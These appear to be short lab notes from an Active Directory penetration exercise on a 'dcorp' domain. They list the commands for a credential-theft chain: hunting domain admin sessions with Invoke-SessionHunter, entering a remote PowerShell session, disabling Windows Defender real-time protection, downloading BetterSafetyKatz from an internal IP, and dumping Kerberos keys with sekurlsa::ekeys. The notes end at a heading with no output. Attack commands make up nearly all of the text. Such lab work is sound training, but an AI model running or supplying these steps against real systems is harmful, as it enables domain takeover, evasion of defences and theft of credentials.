Untitled

Enumerating Machines Where Domain Admin Have Session On

Loading Invoke-SessionHunter Script

. .\\Invoke-SessionHunter.ps1

Running The Script

Invoke-SessionHunter -Verbose

Untitled

Compromising Machine and Escalating to Domain Admins

Enter-PSSession -ComputerName dcorp-ci

Untitled

Shutting the Windows defender

Set-MpPreference -DisableRealtimeMonitoring $true

Untitled

Transferring BetterSafetyKatz to the Machine

wget -Uri <http://172.16.100.22/BetterSafetyKatz.exe> -OutFile BetterSafetyKatz.exe

Untitled

Now Damping the secrets

.\\BetterSafetyKatz.exe '"sekurlsa::ekeys"' "exit"

Untitled

The Secrets